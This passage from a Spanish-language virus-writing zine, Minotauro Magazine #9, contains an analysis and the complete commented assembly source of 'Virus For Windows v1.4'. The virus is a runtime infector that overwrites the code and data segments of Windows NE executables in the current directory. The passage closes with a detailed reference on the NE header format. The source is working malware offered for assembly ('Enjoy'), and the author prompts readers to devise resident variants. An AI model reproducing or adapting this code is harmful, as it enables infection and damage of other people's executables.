que se le parezca; es un virus runtime (es tan obvio que por eso no lo dije antes). Infecta todos los ejecutables de Windows que encuentra dentro del directorio donde se encuentra. No tiene m‚todo de b£squeda (como los virus runtime mas avanza- dos en DOS). Esto lo hace un virus con bastante poco alcance. (De hecho yo no consegu¡ un file infectado; me pasaron el carrier). En cuanto a la calidad del codigo, hay un monton de NOPs (solo dios sabe con que lo ensamblo), y un poco de codigo muerto, ademas de una estructura similar a las que se manda a 4B00 en ES:BX que no se usa nunca, lo que hace pensar que el autor intento correr la aplicacion desinfectada y no lo logro (dejando la estructura "olvidada" ahi). Por otro lado no hay nada mas que decir del codigo. Como sea y para redondear, el virus aunque primitivo comparativamente a un virus similar de DOS, demuestra un modo exitoso de manipulaci¢n del header de un EXE de Windows. // Bill's Last Words // Antes del c¢digo, un par de reflecciones y conjeturas, a las que llegamos observando el virus y la estructura de EXE de Windows. Ser  realmente imposible devolver el control al host? Quiz  si, en todo caso va a implicar una manipulaci¢n mayor del EXE. Por ejemplo se podr¡a agregar el c¢digo del virus al final del segmento de c¢digo (lo mismo los datos) y hacer un JMP intrasegmento al host. El problema es que el segmento de c¢digo puede no ser lo £ltimo que hay en el ejecutable, atr s del c¢digo puede haber todo tipo de gadorchas malignas e insospechadas (datos, bitmaps, iconos, y dem s boludeces Windozeanas). Habr¡a que mover para ac  y para all  medio EXE (y tomar¡a un tiempo proporcionalmente mayor). O sino lo que se podr¡a hacer es definir otro segmento y hacer un JMP intersegmen- to al host. Lo cual nos deja en la misma parada, ya que habr¡a que INSERTAR una entrada en la Segment Table. Y esto sin considerar que no estamos seguros que este JMP no cuelgue la protecci¢n por algo que no hemos considerado (alg£n registro quedo medio torcido). Por otro lado, la "residencia". Ser  imposible hacer un virus que quede en background para infectar? La pregunta queda planteada. Piensen esto: la cuesti¢n no es quedar en background en si, lo cual es f cil, sino reconseguir el control (tampoco muy complicado) y conseguir ejecutables para infectar (he aqu¡ la cuesti¢n). Reflexionenlo en sus hogares. Esto es todo, por hoy. Los dejo con el source. // Bueno Y el Source?? // Helo aqu¡. Esta comentado, pero les aviso que para entenderlo es recomendable tener al lado la tablita con la estructura del header de EXE de Windows, que acompa¤a esta edici¢n. Enjoy. - cut here ---------------------------------------------------------------- ; "Virus For Windows v1.4" ; Virus runtime Infector de EXE de Windows ; Ensamblar con el switch /m3 (tasm /m3 wvir.asm) ; Desensamblado por Trurl para Minotauro Magazine #9 ;= DATA TYPES =============================================================== ; Primero unas definiciones de estructuras que el codigo usa (defino todos ; los campos aun los que no usa porque asi es mas comodo) DosExeHeader struc ; Header de EXE de DOS D_Signature dw 'ZM'; 00h : Signature for DOS header (MZ) D_Reminder dw 0 ; 02h : Nr. of bytes in the last page D_PageCount dw 0 ; 04h : Nr. of pages rounder up D_RelocCount dw 0 ; 06h : Nr. of items in reloc table D_HeaderSize dw 0 ; 08h : Header Size in paras including realoc table D_MinAlloc dw 0 ; 0Ah : Minimum alloc (required) D_MaxAlloc dw 0 ; 0Ch : Maximum alloc (desired, usualy ffff) D_OrigSS dw 0 ; 0Eh : SS on start D_OrigSP dw 0 ; 10h : SP on start D_Checksum dw 0 ; 12h : Checksum for EXE (not used) D_OrigIP dw 0 ; 14h : IP on start (ep) D_OrigCS dw 0 ; 16h : CS on start (ep) D_RealocTblOff dw 0 ; 18h : Offset to realoc table relative to begining of file D_Overlay dw 0 ; 1Ah : Nr of overlays (not used) dw 10h dup(0); 1Ch : Reserved space D_NEOffset dd 0 ; 3Ch : Offset to NE header (if there is one) DosExeHeader ends WinExeHeader struc ; Header de EXE de Windows W_Signature dw 0 ; 00h : Signature for windows header (NE) W_LinkerVer dw 0 ; 02h : Linker version (lo bytes is version nr., hi byte is revision nr.) W_EntryTblOff dw 0 ; 04h : Offset of entry table relative to begining of header W_EntryTblLen dw 0 ; 06h : Size of entry table in bytes W_Reserved1 dw 0,0 ; 08h : CRC of entire file ? W_Flags dw 0 ; 0Ch : Flags that describe the EXE W_DataSegment dw 0 ; 0Eh : Automatic data segment number (is index in segment table) W_HeapSize dw 0 ; 10h : Initial size of heap in bytes W_StackSize dw 0 ; 12h : Initial size of stack in bytes W_OrigIP dw 0 ; 14h : IP on start W_OrigCS dw 0 ; 16h : Code segment W_OrigSP dw 0 ; 18h : SP on start W_OrigSS dw 0 ; 1Ah : Stack segment W_SegmTblCount dw 0 ; 1Ch : Number of entries in the segment table W_ModTblCount dw 0 ; 1Eh : Number of entries in the module-reference table W_NRNTblCount dw 0 ; 20h : Number of entries in the nonresident-name table W_SegmTblOff dw 0 ; 22h : Offset of segment table relative to begining of header W_ResTblOff dw 0 ; 24h : Offset of resource table relative to begining of header W_RNTblOff dw 0 ; 26h : Offset of resident-name table relative to begining of header W_ModTblOff dw 0 ; 28h : Offset of module-reference table relative to begining of header W_INameTblOff dw 0 ; 2Ah : Offset of imported-name table relative to begining of header W_NRNTblOff dd 0 ; 2Ch : Offset of nonresident-name table relative to begining of FILE W_MoveEP dw 0 ; 30h : Number of moveable entry points (?) W_ShiftCount dw 0 ; 32h : Shift count used to align sectors W_ResSegmCount dw 0 ; 34h : Number of resource segments W_TargetOS db 0 ; 36h : Target operating system W_Info db 0 ; 37h : Additional info W_FastLoadOff dw 0 ; 38h : offset in sectors to the begining of the fastload area W_FastLoadLen dw 0 ; 3Ah : length in sectors of the fast load area W_Reserved2 dw 0 ; 3Ch W_WinVer dw 0 ; 3Eh : Expected windows version WinExeHeader ends SegmentTableEntry struc ; Entrada de la Segment Tabvle SegmentOff dw 0 ; 0h : Offset in segments to the segment data SegmentLen dw 0 ; 2h : Size of segment in bytes SegmentType dw 0 ; 4h : flags for segment type SegmentMinAlloc dw 0 ; 6h : minimum allocation size SegmentTableEntry ends code segment para public assume cs:code, ds:data, ss:data, es:data NOSMART ;= CARRIER ================================================================== ; Este peque¤o codigo solo es parte del carrier, no del virus, que es ; cargado con DS ya inicalizado al segmento de datos en los hosts que ; infecta. Como el virus debe empezar desde 100h, hay que hacer este ; arreglito: org 100h - (carrierend - carrierstart) carrierstart: MOV AX,CS ADD AX, CODELEN MOV DS,AX carrierend: ;= VIRUS CODE =============================================================== ; Aqui comienza el virus en si org 100h virstart: ; Copia el nombre del ejecutable actual (del host actual) desde la DTA, ; que es donde la 4E lo dejo antes de que infectara, a un buffer especial. CLD PUSH ES PUSH DS POP ES MOV SI,offset DTAfname MOV DI,offset FileName MOV CX,13 REPZ MOVSB ; setea el address de la DTA a la estructura MOV DX,offset DTA MOV AH,1Ah INT 21h ; comienza la busqueda de *.EXEs MOV DX, offset FileMask XOR CX,CX MOV AH,4Eh keeplooking: INT 21h JB nomorefound ; No encuentra mas EXE; salir ; Encontro un EXE ; intentar infectarlo MOV DX,offset DTAfname CALL infect ; Sigue buscando EXEs MOV AH,4FH JMP keeplooking ; keep looking nomorefound: ; No se encontraron mas EXEs; desinfectar el file actual MOV DX,offset FileName CALL clean POP ES ; y terminar normalmente MOV AX,4C00h INT 21h infect: ; abrir el file MOV AX,3D02h INT 21h JB quitinfect ; salir si no se lo pudo abrir XCHG BX,AX ; verificar que el file sea valido para la infeccion MOV SI,offset HeaderBuffer CALL verifyfile JB abortinfect ; si no es valido no lo infecta ; Verificar que el IP del header no sea igual a 100h, esto actua como ; marca de infeccion ademas. Si el IP del header es 100h, el file ; probablemente ya esta infectado. CMP WORD PTR [SI+W_OrigIP],0100h JZ abortinfect ; si ya esta infectado no lo infecta ; conseguir la date & time del file y guardarlas MOV AX,5700h INT 21h PUSH CX PUSH DX CALL infectfile ; infectar el file POP DX POP CX ; restaurar la date & time originales del file MOV AX,5701h INT 21h abortinfect: ; cerrar el file MOV AH,3Eh INT 21h quitinfect: RET ; salir clean: ; abrir el file MOV AX,3D02h INT 21h JB quitinfect XCHG BX,AX ; Verificar si el file es valido y que esta infectado MOV SI,offset HeaderBuffer CALL verifyfile JB abortinfect CMP WORD PTR [SI+W_OrigIP],0100h JNZ abortinfect ; guardar los atributos originales del file MOV AX,5700h INT 21h PUSH CX PUSH DX ; porque el autor puso el codigo de desinfeccion en dos rutina y no ; en una escapa a mi comprension CALL disinfect CALL continue_disinfect ; restaurar los atributos originales del file POP DX POP CX MOV AX,5701h INT 21h ; salir JMP abortinfect verifyfile: ; Esta rutina verifica que un EXE sea viable para la infeccion. El handle ; viene en BX ; Leer el header a HeaderBuffer CALL readhdr CMP WORD PTR [SI],'ZM' ; es un EXE? Verificar la Signature JNZ wrongfile ; si la tabla de realocacion no esta en 40h, entonces no es un EXE de ; Windows CMP WORD PTR [SI+D_RealocTblOff],40H JB wrongfile ; Conseguir el offset del Header de Windows y mover alli el puntero MOV AX,[SI+offset D_NEOffset] MOV DX,[SI+offset D_NEOffset+2] CALL fseek ; salvar el offset del header de windows para calcular bien los offset relativos al comienzo del header MOV DS:word ptr NEOffset,AX MOV DS:word ptr NEOffset+2,DX ; leer el header de windows a HeaderBuffer CALL readhdr ; Es un EXE de Windows Valido? CMP WORD PTR [SI+W_Signature],'EN' JNZ wrongfile ; 01CF ; El bit 1 (0x002) significa que el file es MULTIPLEDATA. Los bits 8 y 9 ; (0x0100 | 0x0200) estan marcados como reserved. (?) CMP WORD PTR [SI+W_Flags],0302h JNZ wrongfile ; si la alineacion de los segmentos del file no es por paragrafos ; (un shift count = 4) no se puede infectar CMP BYTE PTR [SI+W_ShiftCount],04h JNZ wrongfile ; target operating system = windows CMP WORD PTR [SI+W_TargetOS],0802h JNZ wrongfile CLC RET wrongfile: STC abortinfectfile: ; spaghetti code al viejo estilo RET infectfile: ; Esta rutina infecta el file, luego de que ya se ha verificado que el file ; se puede infectar. DS:SI apunta a HeaderBuffer (en donde esta leido el NE header) ; Lee la entrada de la segment table correspondiente ; al segmento de codigo MOV AX,[SI+W_OrigCS] MOV DX,offset CodeSegment CALL readsegm ; Si el size del segmento de codigo es menor a 3AE CMP DS:WORD PTR [CodeSegment+SegmentLen],3AEH ; HERE I AM JB abortinfectfile ; si el segmento de codigo no es MOVEABLE & EXECUTEONLY aborta CMP DS:BYTE PTR [CodeSegment+SegmentType],50h JNZ abortinfectfile ; leer la entrada de la seg.table corresp. al segmento de datos automatico MOV AX,[SI+W_DataSegment] MOV DX,offset DataSegment CALL readsegm ; si el largo del segmento de datos < 4A8, aborta CMP DS:WORD PTR [DataSegment+SegmentLen],4A8H; HERE I AM JB abortinfectfile ; lee los primeros bytes del segmento de codigo a la heap MOV AX,DS:word ptr [CodeSegment+SegmentOff] CALL fseek2segment MOV DX,offset heapstart MOV CX,CODESIZE NOP CALL read ; y los escribe al final del file CALL gotoeof MOV DX,offset heapstart MOV CX,CODESIZE NOP CALL write ; leer los primeros bytes del segmento de datos a la heap MOV AX,ds:word ptr [DataSegment+SegmentOff] CALL fseek2segment MOV DX,offset heapstart MOV CX,heapstart - datastart NOP CALL read ; y los escribe al final CALL gotoeof MOV DX,offset heapstart MOV CX,heapstart - datastart NOP CALL write ; salvar las flags del segmento de codigo para luego poder desinfectar PUSH word ptr [CodeSegment+SegmentType] POP [OldCSFlags] ; baja el bit de discardable. Si el segmento de codigo era ; discardable, ahora no lo es. AND ds:WORD PTR [CodeSegment+SegmentType],0FEFFh ; escribe la entrada del segment table correspondiente al segm de codigo ; (que acaba de modificar) MOV AX,[SI+W_OrigCS] MOV DX,offset CodeSegment CALL writesegm ; va al principio del header XOR AX,AX CWD CALL fseekrel ; salva IP del header para luego poder desinfectar PUSH [SI+W_OrigIP] POP [OldIP] ; nuevo IP = 100h MOV WORD PTR [SI+W_OrigIP],100h ; escribe el header modificado CALL writehdr ; va a la posicion del file donde empiezan los datos del segmento de ; codigo MOV AX,ds:word ptr [CodeSegment+SegmentOff] CALL fseek2segment ; y escribe el virus alli (al principio del segmento de codigo) PUSH DS PUSH CS ; NOTESE QUE EL CODIGO NUNCA USA ESTE DS, POP DS ; si lo hiciera, saltaria la proteccion MOV DX,offset virstart MOV CX,CODESIZE NOP CALL write POP DS ; y escribe la data del virus al principio del segmento de datos MOV AX,ds:word ptr [DataSegment+SegmentOff] CALL fseek2segment MOV DX,offset virstart MOV CX,heapstart-datastart NOP CALL write RET ; ya infecto! disinfect: ; Esta rutina desinfecta el host actual. El header, la entrada del segmento ; de codigo y de datos estan leidas en sus respectivos buffer. El nombre ; del file esta en FileName ; leer la entrada del segment table corresp al segm de datos de la aplic. MOV AX,[SI+W_DataSegment] MOV DX,offset DataSegment CALL readsegm ; seekear a la data del segmento de datos MOV AX,ds:word ptr [DataSegment+SegmentOff] CALL fseek2segment ; leer la data del segmento de data MOV DX,offset virstart MOV CX,heapstart-datastart NOP CALL read RET continue_disinfect: ; restaurar las flags del segmento de codigo ; dentro del segment table PUSH ds:word ptr [OldCSFlags] POP ds:word ptr [CodeSegment+SegmentType] ; escribe la entrada del segmento de codigo dentro de la segment table ; (que acaba de restaurar y desinfectar) MOV AX,[SI+W_OrigCS] MOV DX,offset CodeSegment CALL writesegm ; restaura el IP original del exe PUSH ds:word ptr [OldIP];[01A0] ; en 1A0 esta salvado el IP POP [SI+W_OrigIP] ; seekea al principio del NE XOR AX,AX CWD CALL fseekrel ; reescribe el header "des-modificado" CALL writehdr ; lee los datos originales del principio del segmento de datos (que esta ; al final del file) CALL gotoeof SUB AX,heapstart-datastart NOP SBB DX,0 PUSH AX PUSH DX CALL fseek MOV DX,offset heapstart MOV CX,heapstart-datastart NOP CALL read ; seekea al principio del segmento de datos MOV AX,ds:word ptr [DataSegment+SegmentOff] CALL fseek2segment ; re-escribe el principio del segmento de datos con los datos originales MOV DX,offset heapstart MOV CX,heapstart-datastart NOP CALL write ; lee el codigo original del segmento de codigo que esta al final del ; file, antes de los datos POP DX POP AX SUB AX,CODESIZE NOP SBB DX,0 PUSH AX PUSH DX CALL fseek MOV DX,offset heapstart MOV CX,CODESIZE NOP CALL read ; seekea al principio del segmento de codigo MOV AX,ds:word ptr [CodeSegment+SegmentOff] CALL fseek2segment ; y lo escribe MOV DX,offset heapstart MOV CX,CODESIZE NOP CALL write ; seekea al principio del codigo agregado POP DX POP AX CALL fseek ; y alli escribe 0 bytes (corta el file) MOV CX,0 CALL write RET ; ya desinfecto readsegm: ; Esta rutina lee un segmento de la segment table del EXE. ; parametros: ; AX = numero de segmento a leer ; BX = handle del file ; DX = offset donde leer la entrada (8 bytes) PUSH DX DEC AX ; la tabla es 1-based???? MOV CX,8 MUL CX ; multiplica el nro de segmento por 8 (el largo de cada entrada) ADD AX,[SI+W_SegmTblOff] ADC DX,0 ; a eso le agrega el offset del principio de la tabla CALL fseekrel ; y va alli relativo al principio del header POP DX MOV CX,8 ; y ahora lee los 8 bytes y vuelve JMP read readhdr: ; 333 ; Esta rutina lee 40h bytes de un file (se la usa para leer los header MZ y ; NE, de ahi el nombre). El handle viene en BX, se lo lee a HeaderBuffer MOV DX,offset virstart MOV CX,40h read: MOV AH,3Fh INT 21h RET writesegm: ; Esta rutina es igual a la rutina readsegm, excepto que escribe en vez ; de leer. Los parametros son iguales. PUSH DX DEC AX MOV CX,8 MUL CX ADD AX,[SI+W_SegmTblOff] ADC DX,0 CALL fseekrel POP DX MOV CX,8 JMP write writehdr: ; Esta rutina se usa para escribir el header NE modificado MOV DX,offset virstart MOV CX,40h write: MOV AH,40h INT 21h RET gotoeof: MOV AX,4202h XOR CX,CX CWD INT 21h RET fseekrel: ; Esta rutina mueve el puntero del file relativamente al principio del NE ; header, cuyo offset esta en NEOffset ADD AX,ds:word ptr NEOffset ADC DX,ds:word ptr NEOffset+2 JMP fseek fseek2segment: ; Rutina que mueve el puntero del file sobre los datos de un segmento. ; parametro; AX = offset del segmento en sectores (paras). MOV CX,10h MUL CX ADD AX,100h ADC DX,0 JMP fseek ; CODIGO MUERTO, 3 BYTES XOR AX,AX CWD fseek: ; Self explanatory XCHG CX,DX XCHG DX,AX MOV AX,4200h INT 21h RET ; CODIGO MUERTO, 9 BYTES XCHG CX,DX XCHG DX,AX MOV AX,4201h INT 21h RET VirusName db " Virus_for_Windows v1.4 ",0,0,0 ; Un nombre de una descollante originalidad :) virend: ends ;= VIRUS DATA =============================================================== data segment para public org 100h datastart label CODELEN equ (virend-virstart+15 + 100h) SHR 4 ; tama¤o del codigo en paras redondeado hacia arriba CODESIZE equ (virend-virstart-2) ; tama¤o del codigo en bytes HeaderBuffer db 40h dup('a') ; En este buffer lee los header NE y MZ CodeSegment db 8 dup('b') ; En este buffer lee la entrada de la segment table ; correspondiente al segmento de codigo DataSegment db 8 dup('c') ; En este buffer lee la entrada de la segment table ; correspondiente al segmento de datos DTA db 30 dup('d') ; la DTA que usa para el findfirst/findnext DTAfname db 13 dup('d') ; El filename retornado por findfirst/findnext FileMask db "*.EXE",0 ; usado para el findfirst/findnext FileName db 13 dup('e') ; aqui el virus copia el filename del file ; actual antes de volver a usar la DTA dw 8000h,0,0,5ch,0,6ch,0 ; a primera vista esto que esta aca arriba ; tiene toda la pinta de ser una de las estructuras ; que se mandan a 4B00 en ES:BX, pero nunca es ; usada en el codigo. Quiza el autor intento correr ; ‚l la aplicacion host desinfectada y no lo logro, ; olvidando esta estructura aca? NEOffset dd 0 ; offset del NE dentro del file (usado para calcular los otros offsets) OldIP dw 0 ; IP original del NE del file infectado OldCSFlags dw 0 ; flags originales del segmento de codigo db "MK92" ; iniciales del autor y a¤o? heapstart label db "Hola! Soy un source de Minotauro. Trurl, tgc" ends end carrierstart - cut here ---------------------------------------------------------------- Hasta la pr¢xima edici¢n de Minotauro (QUE VA A SEGUIR SALIENDO POR SI A ALGUIEN LE CABE ALGUNA DUDA, OSEA QUE VA A HABER UNA PROXIMA EDICION, NO SE ACABA ACA, ETC) :). Y como ultimas palabras de este articulo : PIENSEN- LON. Eso es todo. Trurl, tgc MINOTAURO MAGAZINE #9: Nuevo Header de Windows por Bill & friends Este es el formato completo de los NE (Nuevo Ejecutable) de Windows. Gran parte de esto no es relevante para la infecci¢n (por ejemplo la resource table, que es la que indica donde est n los recursos (iconos, bitmaps) que est n puestos dentro del ejecutable) algunas partes si (la Segment Table) pero preferimos ponerlo completo de todos modos. Y antes de entrar un par de notas. Los segmentos de memoria en Windows pueden ser moviles y descartables. Que sea movil significa que Windows puede mover el segmento de lugar dentro de la memoria para reorganizarla. Debido al mecanismo de segmentaci¢n en modo protegido, la aplicaci¢n jamas se da cuenta de esto; y por lo tanto la gran mayor¡a de los segmentos (incluso de c¢digo) son m¢viles. Los segmentos fijos existen para casos especiales como dispositi- vos de hard que necesitan usar alguna direcci¢n de memoria (FISICA) especifica. Un segmento descartable significa que el segmento puede ser desalojado de memoria si hay que hacer lugar. (Y vuelto a cargar cuando se lo necesita de nuevo). Segmentos de c¢digo, por ejemplo, que no cambian jamas, pueden dese- charse si la aplicaci¢n esta en background y ser vueltos a cargar cuando recupera el foco, sin que sea aparente. Y ahora respecto a los nombres: "nombres importados" o "exportados" significan algo as¡ como entry points que se necesitan de otros m¢dulos, y entry points que se dan a disposici¢n de otros m¢dulos dentro de este modulo. Por ejemplo si una DLL contiene una funci¢n "PerformStuff", este nombre estar  exportado dentro de la DLL, e importado dentro de todas las aplicaciones que lo usen. Este mecanismo de "importaci¢n y exportaci¢n de nombres" permite a Windows hacer todo el linkeo din mico. Trurl °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Windows New Header (NE) El bloque de informacion en el Header de Windows contiene el numero de ver- sion del linker, los largos de varias otras tablas que describen el file ejecu- table, los offsets desde el principio del header al comienzo de estas tablas, los tama¤os de la heap y la stack, etc. La siguiente lista compendia el contenido del bloque de informacion del header (los offset son relativos al comienzo del bloque): Offset Descripcion 00h Especifica la word de Signature. El byte mas bajo contiene 'N' (4Eh) y el byte mas alto contiene 'E' (45h) 02h Especifica el numero de version del linker. 03h Especifica el numero de revision del linker. 04h Especifica el offset de la Entry Table (relativo al principio del header). 06h Especifica el largo de la Entry Table, en bytes. 08h Reservado. 0Ch Especifica flags que describen el contenido del file ejecutable. Este valor puede contener uno o mas de los sgtes. bits: Bit Significado 0 El linker setea este bit si el formato del file ejecutable es SINGLEDATA. Un file ejecutable con este formato contiene un segmento de datos. Este bit esta seteado si el file es una dynamic-link library (DLL). 1 El linker setea este bit si el formato del file ejecutable es MULTIPLEDATA. Un file ejecutable con este formato contiene multiples segmentos de datos. Este bit esta seteado si el file es una aplicacion Windows. Si ni el bit 0 ni el 1 esta seteado, el formato del file ejecutable es NOAUTODATA. Un file ejecutable con este formato no contiene un segmento de datos automatico. 2 Reservado. 3 Reservado. 8 Reservado. 9 Reservado. 11 Si este bit esta seteado, el primer segmento del file ejecutable contiene codigo que carga la aplicacion. 13 Si este bit esta seteado, el linker detecto errores en el momendo del linkeo, pero creo el ejecutable de todos modos. 14 Reservado. 15 Si este bit esta seteado, el file ejecutable es modulo de libreria (DLL). Si el bit 15 esta seteado, los registros correspondientes al CS:IP inicial apuntan a la rutina de inicializacion llamada con el valor de AX igual al handle del modulo. La rutina de inicializacion debe devolver el control con un far return. Si la rutina termina exi- tosamente, el valor en AX es no cero. Si no, es cero. El valor en el registro DS es seteado al segmento de datos de la libreria si el file es SINGLEDATA. Si esto no es asi, DS es seteado al segmento de datos de la aplicacion que carga la libreria. 0Eh Especifica el numero de segmentos de datos automaticos. (0E es cero si los bits SINGLEDATA y MULTIPLEDATA estan en cero). 10h Especifica el tama¤o inicial en bytes de la heap local. Este valor es cero si no hay alocacion local de memoria. 12h Especifica el tama¤o inicial, en bytes, de la stack. Este valor es cero si el valor inicial del registro SS no es igual al valor de DS. 14h Especifica el valor (segment:offset) del CS:IP inicial. 18h Especifica el valor (segment:offset) del SS:SP inicial. El valor especificado en SS es un indice en la Segment Table. La primera entrada en la Segment Table corresponde al segmento numero 1. Si SS direcciona al segmento de datos automatico y SP es cero, SP es seteado a la direccion obtenida sumando el tama¤o de segmento de datos automatico al tama¤o de la stack. 1Ch Especifica el numero de entradas en la Segment Table. 1Eh Especifica el numero de entradas en la Module-Reference Table. 20h Especifica el numero de bytes en la Nonresident-Name Table. 22h Especifica el offset al principio de la Segment Table relativo al principio del header de Windows. 24h Especifica el offset al principio de la Resource Table relativo al principio del header de Windows. 26h Especifica el offset al principio de la Resident-Name Table relativo al principio del header de Windows. 28h Especifica el offset al principio de la Module-Reference Table relativo al principio del header de Windows. 2Ah Especifica el offset al principio de la Imported-Name Table relativo al principio del header de Windows. 2Ch Especifica el offset al principio de la Non-Resident Name Table, relativo al principio del file. (Por eso es un dword). 30h Especifica el numero de entry-points movibles. 32h Especifica el shift count que se usa para alinear los sectores logicos. Este valor es log2 del tama¤o del sector segmento. Tipicamente es 4, aunque el default es 9. (Este valor corresponde al switch del linker /alignment [/a]. Cuando la command line del linker contiene /a:16, la shift count es 4. Cuando la linea de comandos del linker contiene /a:512, la shift count es 9.) 34h Especifica el numero de segmentos de resources. 36h Especifica el sistema operativo a donde esta destinado a correrse. Los bits son: Bit Meaning 0 Formato de sistema operativo desconocido. 1 Reservado. 2 Sistema operativo: Microsoft Windows. 3 Reservado. 4 Reservado. 37h Especifica informacion adicional acerca del file ejecutable. Puede ser uno o mas de los sgtes valores: Bit Meaning 1 Si este bit esta seteado, el file ejecutable contiene una aplicacion de Windows 2.x que corre en modo protegido version 3.x 2 Si este bit esta setead, el ejecutable contiene una aplicacion de Windows 2.x que soporta Fonts proporcionales. 3 Si este bit esta seteado, el file ejecutable contiene un area de "fast-load" 38h Especifica el offset, en sectores, al principio del area de "fast-load". (Solo Windows usa este valor). 3Ah Especifica el largo, en sectores, del area de fast-load. (Solo Windows usa este valor). 3Ch Reservado. 3Eh Especifica la version esperada de Windows. (Solo Windows usa este valor). °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Segment Table La Segment Table contiene informacion que describe cada segmento dentro del file ejecutable. Esta informacion incluye el largo del segmento, el tipo de segmento, y los datos de realocacion de segmento. La siguiente lista es un sumario de los valores que se encuentran en la segment table. (los offsets son relativos al principio de cada entrada). Location Description 00h Especifica el offset, en sectores, de los datos de este segmento (relativo al principio del file). Un valor de cero significa que no existen datos. 02h Especifica el largo, en bytes, del segmento, en el file. Un valor de cero significa que el largo del segmento es 64k, a menos que el offset del selector tambien sea cero. 04h Especifica flags que describen el contenido del file ejecutable. Este valor puede ser una combinacion de uno o mas de los sgtes: Bit Meaning 0 Si este bit esta seteado, el segmento es un segmento de datos. Si no lo esta, se trata de un segmento de codigo. 1 Si este bit esta seteado, el loader ha alocado memoria para el segmento. 2 Si este bit esta seteado, el segmento esta cargado. 3 Reservado. 4 Si este bit esta seteado, el tipo de segmento es MOVEABLE (Movil). De otro modo, el segmento es FIXED (Fijo). 5 Si este bit esta seteado, el tipo de segmento es PURE o SHAREABLE. De otro modo, el segmento es IMPURE o NONSHEAREABLE. 6 Si este bit esta seteado, el typo de segmento es PRELOAD. De otro modo, se trata de un segmento LOADONCALL. 7 Si este bit esta seteado y el segmento es un segmento de codigo, el tipo de segmento es EXECUTEONLY. Si este bit esta seteado y el segmento es un segmento de datos, el segmento es de tipo READONLY. 8 Si este bit esta seteado, el segmento contiene datos de realocacion. 9 Reservado. 10 Reservado. 11 Reservado. 12 Si este bit esta seteado, el segmento es descartable (discardable). 13 Reservado. 14 Reservado. 15 Reservado. 06h Especifica el tama¤o minimo de alocacion del segmento, en bytes. Un valor de cero indica que el minimo tama¤o de alocacion es 64k. °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Resource Table La resource table describe e identifica la posicion de cada recurso dentro del file. La tabla tiene la siguiente forma: WORD rscAlignShift; TYPEINFO rscTypes[]; WORD rscEndTypes; BYTE rscResourceNames[]; BYTE rscEndNames; A continuacion los miembros de la resource table: rscAlignShift Especifica el alignment shift count para los datos del recurso. Cuando el shift count es usado como un exponente de 2, el valor resultante especifica el factor, en bytes, para computar la posicion del recurso dentro del ejecutable. rscTypes Especifica un array de estructuras TYPEINFO que contienen informacion acerca del tipo de recurso. Debe haber al menos una estructura TYPEINFO para cada tipo de recurso en el file ejecutable. rscEndTypes Especifica el fin de las definiciones de tipo de recursos. Este miembro debe ser cero. rscResourceNames Especifica los nombres (si los hay) asociados a los recursos en esta tabla. Cada nombre esta guardado como bytes consecutivos; el primer byte especifica el numero de caracteres en el nombre. rscEndNames Especifica el fin de los nombres de recursos y el fin de la Resource Table. Este miembro debe ser cero. Type Information La estructura TYPEINFO tiene la siguiente forma: typedef struct _TYPEINFO { WORD rtTypeID; WORD rtResourceCount; DWORD rtReserved; NAMEINFO rtNameInfo[]; } TYPEINFO; A continuacion los miembros de la estructura TYPEINFO: rtTypeID Especifica el identificador de tipo del recurso. Este valor entero es o bien un valor de tipo de recurso, o un offset a un nombre de tipo de recurso. Si el bit mas alto en este miembro esta seteado (0x8000), el valor es uno de los siguientes valores de tipo de recursos: Valor Tipo de recurso RT_ACCELERATOR Accelerator table RT_BITMAP Bitmap RT_CURSOR Cursor RT_DIALOG Dialog box RT_FONT Font component RT_FONTDIR Font directory RT_GROUP_CURSOR Cursor directory RT_GROUP_ICON Icon directory RT_ICON Icon RT_MENU Menu RT_RCDATA Resource data RT_STRING String table Si el bit mas alto del valor de este miembro no esta seteado, el valor representa un offset, en bytes y relativo al principio de la Resource Table, a un nombre en el miembro rscResourceNames. rtResourceCount Especifica el numero de recursos de este tipo en el file ejecutable. rtReserved Reservado. rtNameInfo Especifica un array de estructuras NAMEINFO que contienen informacion acerca de cada recurso. El miembro rtResourceCount especifica el numero de estructuras en este array. Name Information La estructura NAMEINFO tiene la siguiente forma: typedef struct _NAMEINFO { WORD rnOffset; WORD rnLength; WORD rnFlags; WORD rnID; WORD rnHandle; WORD rnUsage; } NAMEINFO; A continuacion los miembros en la estructura NAMEINFO: rnOffset Especifica un offset a los datos del recurso (relativo al principio del file). El offset es en terminos de unidades de alineacion (a- lignment units) especificadas por el miembros rscAlighShift al principio de la Resource Table. rnLength Especifica el largo del recurso, en bytes. rnFlags Especifica si el recurso es fijo, preloaded, o shareable. Este miembro puede ser uno o mas de los sgtes valores: Valor Significado 0x0010 El recurso es movil (MOVEABLE). Si no es fijo (FIXED) 0x0020 El recurso puede ser compartido (PURE) 0X0040 El recurso es precargado (PRELOAD). De otro modo, es carga- do cada vez que se pide. rnID Especifica o apunta al identificador del recurso. Si el identificador es un entero, el bit mas alto esta seteado (8000h). De otro modo, es un offset a una string de recurso, relativa al principio de la Resource Table. rnHandle Reservado. rnUsage Reservado. °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Resident Name Table La Resident-Name Table contiene strings que identifican las funciones exporta- das en el file ejecutable. Como el nombre implica, estas strings residen en la memoria del sistema y nunca son descartadas. Las strings de resident-names son case-sensitive y no son terminadas en cero. La siguiente lista sumariza los valores que se encuentran en la Resident-Name Table (los offset son relativos al principio de cada entrada). Offset Descripcion 00h Especifica el largo de la string. Si no hay mas strings en la tabla, este valor es cero. 01h * xxh Especifica el texto del resident-name. Esta string es case-sensitive y no terminada en cero. xxh + 01h Especifica un numero ordinal que identifica a la string. Este numero es un indice dentro de la Entry Table. La primera string en la Resident-Name Table es el nombre del modulo. °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Module Reference Table La Module-Reference Table contiene offsets para los nombres de modulos guarda- dos en la Imported-Name Table. Cada entrada en esta tabla es de 2 bytes. 